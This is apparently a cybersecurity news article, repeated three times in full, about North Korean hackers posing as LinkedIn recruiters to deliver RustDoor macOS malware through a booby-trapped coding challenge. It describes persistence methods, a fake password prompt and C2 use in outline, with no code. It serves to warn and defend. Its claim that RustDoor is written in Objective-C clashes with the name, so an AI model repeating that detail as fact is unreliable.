North Korean Hackers Use LinkedIn to Target Crypto Sector with RustDoor Malware

Cybersecurity researchers have issued warnings about North Korean threat actors using LinkedIn to deliver malware, specifically RustDoor, to unsuspecting victims. The latest alert comes from Jamf Threat Labs, which uncovered an attack where a LinkedIn user was contacted by someone posing as a recruiter for STON.fi, a legitimate decentralized cryptocurrency exchange (DEX).

This activity is part of a larger, coordinated campaign by state-backed hackers from the Democratic People’s Republic of Korea (DPRK). These hackers aim to infiltrate the networks of organizations, often under the guise of conducting interviews or technical assessments. Their primary targets are the financial and cryptocurrency sectors, which North Korean actors exploit to generate illicit revenue and achieve regime-driven objectives.

The attackers employ sophisticated, hard-to-detect social engineering techniques. These campaigns, particularly those aimed at employees within decentralized finance (DeFi) and cryptocurrency firms, have been noted in recent advisories by the U.S. Federal Bureau of Investigation (FBI). One typical tactic involves requesting victims to execute code or download applications on devices with access to internal company networks.

In many cases, attackers ask targets to complete "pre-employment tests" or debugging tasks involving non-standard or suspicious Node.js or PyPI packages, scripts, or GitHub repositories. Recent documentation shows that such attacks have been evolving, using increasingly advanced tools.

The latest attack identified by Jamf involved tricking a victim into downloading a booby-trapped Visual Studio project disguised as part of a coding challenge. This project embedded bash commands that download two second-stage payloads, "VisualStudioHelper" and "zsh_env," which have identical functions. Both malware samples—collectively known as RustDoor (tracked by Jamf as Thiefbucket)—are designed to persist on the victim’s machine through different methods.

The malicious code attempts to maintain persistence through cron jobs for VisualStudioHelper, while zsh_env does so via the zshrc file. RustDoor, a macOS backdoor first detected by Bitdefender in February 2024, has now been formally linked to North Korean hackers for the first time by Jamf. It has also been identified in a Golang variant, known as GateDoor, which is used to target Windows systems.

The malware is notable for being written in Objective-C and acts as both a backdoor and an information stealer. VisualStudioHelper attempts to harvest specified files from the victim's system, prompting the user to enter their system password by mimicking a request from the Visual Studio app to avoid suspicion.

Both payloads establish command-and-control (C2) communications with two different servers, allowing the attackers to control infected devices remotely.

Jamf’s discovery is significant not only because it identifies RustDoor as a North Korean tool but also due to the evolving sophistication of these attacks. The researchers stressed the importance of training employees, particularly developers, to be cautious of unsolicited contacts on social media, especially when asked to run or download unfamiliar software.

“Threat actors are continually adapting to find new ways to target the cryptocurrency industry,” researchers Jaron Bradley and Ferdous Saljooki said. “It's crucial to ensure employees remain skeptical of those who reach out via social media and ask them to execute software of any kind. These DPRK social engineering campaigns are led by actors fluent in English and are well-researched on their targets.”

Cybersecurity researchers have issued warnings about North Korean threat actors using LinkedIn to deliver malware, specifically RustDoor, to unsuspecting victims. The latest alert comes from Jamf Threat Labs, which uncovered an attack where a LinkedIn user was contacted by someone posing as a recruiter for STON.fi, a legitimate decentralized cryptocurrency exchange (DEX).

This activity is part of a larger, coordinated campaign by state-backed hackers from the Democratic People’s Republic of Korea (DPRK). These hackers aim to infiltrate the networks of organizations, often under the guise of conducting interviews or technical assessments. Their primary targets are the financial and cryptocurrency sectors, which North Korean actors exploit to generate illicit revenue and achieve regime-driven objectives.

The attackers employ sophisticated, hard-to-detect social engineering techniques. These campaigns, particularly those aimed at employees within decentralized finance (DeFi) and cryptocurrency firms, have been noted in recent advisories by the U.S. Federal Bureau of Investigation (FBI). One typical tactic involves requesting victims to execute code or download applications on devices with access to internal company networks.

In many cases, attackers ask targets to complete "pre-employment tests" or debugging tasks involving non-standard or suspicious Node.js or PyPI packages, scripts, or GitHub repositories. Recent documentation shows that such attacks have been evolving, using increasingly advanced tools.

The latest attack identified by Jamf involved tricking a victim into downloading a booby-trapped Visual Studio project disguised as part of a coding challenge. This project embedded bash commands that download two second-stage payloads, "VisualStudioHelper" and "zsh_env," which have identical functions. Both malware samples—collectively known as RustDoor (tracked by Jamf as Thiefbucket)—are designed to persist on the victim’s machine through different methods.

The malicious code attempts to maintain persistence through cron jobs for VisualStudioHelper, while zsh_env does so via the zshrc file. RustDoor, a macOS backdoor first detected by Bitdefender in February 2024, has now been formally linked to North Korean hackers for the first time by Jamf. It has also been identified in a Golang variant, known as GateDoor, which is used to target Windows systems.

The malware is notable for being written in Objective-C and acts as both a backdoor and an information stealer. VisualStudioHelper attempts to harvest specified files from the victim's system, prompting the user to enter their system password by mimicking a request from the Visual Studio app to avoid suspicion.

Both payloads establish command-and-control (C2) communications with two different servers, allowing the attackers to control infected devices remotely.

Jamf’s discovery is significant not only because it identifies RustDoor as a North Korean tool but also due to the evolving sophistication of these attacks. The researchers stressed the importance of training employees, particularly developers, to be cautious of unsolicited contacts on social media, especially when asked to run or download unfamiliar software.

“Threat actors are continually adapting to find new ways to target the cryptocurrency industry,” researchers Jaron Bradley and Ferdous Saljooki said. “It's crucial to ensure employees remain skeptical of those who reach out via social media and ask them to execute software of any kind. These DPRK social engineering campaigns are led by actors fluent in English and are well-researched on their targets.”

Cybersecurity researchers have issued warnings about North Korean threat actors using LinkedIn to deliver malware, specifically RustDoor, to unsuspecting victims. The latest alert comes from Jamf Threat Labs, which uncovered an attack where a LinkedIn user was contacted by someone posing as a recruiter for STON.fi, a legitimate decentralized cryptocurrency exchange (DEX).

This activity is part of a larger, coordinated campaign by state-backed hackers from the Democratic People’s Republic of Korea (DPRK). These hackers aim to infiltrate the networks of organizations, often under the guise of conducting interviews or technical assessments. Their primary targets are the financial and cryptocurrency sectors, which North Korean actors exploit to generate illicit revenue and achieve regime-driven objectives.

The attackers employ sophisticated, hard-to-detect social engineering techniques. These campaigns, particularly those aimed at employees within decentralized finance (DeFi) and cryptocurrency firms, have been noted in recent advisories by the U.S. Federal Bureau of Investigation (FBI). One typical tactic involves requesting victims to execute code or download applications on devices with access to internal company networks.

In many cases, attackers ask targets to complete "pre-employment tests" or debugging tasks involving non-standard or suspicious Node.js or PyPI packages, scripts, or GitHub repositories. Recent documentation shows that such attacks have been evolving, using increasingly advanced tools.

The latest attack identified by Jamf involved tricking a victim into downloading a booby-trapped Visual Studio project disguised as part of a coding challenge. This project embedded bash commands that download two second-stage payloads, "VisualStudioHelper" and "zsh_env," which have identical functions. Both malware samples—collectively known as RustDoor (tracked by Jamf as Thiefbucket)—are designed to persist on the victim’s machine through different methods.

The malicious code attempts to maintain persistence through cron jobs for VisualStudioHelper, while zsh_env does so via the zshrc file. RustDoor, a macOS backdoor first detected by Bitdefender in February 2024, has now been formally linked to North Korean hackers for the first time by Jamf. It has also been identified in a Golang variant, known as GateDoor, which is used to target Windows systems.

The malware is notable for being written in Objective-C and acts as both a backdoor and an information stealer. VisualStudioHelper attempts to harvest specified files from the victim's system, prompting the user to enter their system password by mimicking a request from the Visual Studio app to avoid suspicion.

Both payloads establish command-and-control (C2) communications with two different servers, allowing the attackers to control infected devices remotely.

Jamf’s discovery is significant not only because it identifies RustDoor as a North Korean tool but also due to the evolving sophistication of these attacks. The researchers stressed the importance of training employees, particularly developers, to be cautious of unsolicited contacts on social media, especially when asked to run or download unfamiliar software.

“Threat actors are continually adapting to find new ways to target the cryptocurrency industry,” researchers Jaron Bradley and Ferdous Saljooki said. “It's crucial to ensure employees remain skeptical of those who reach out via social media and ask them to execute software of any kind. These DPRK social engineering campaigns are led by actors fluent in English and are well-researched on their targets.”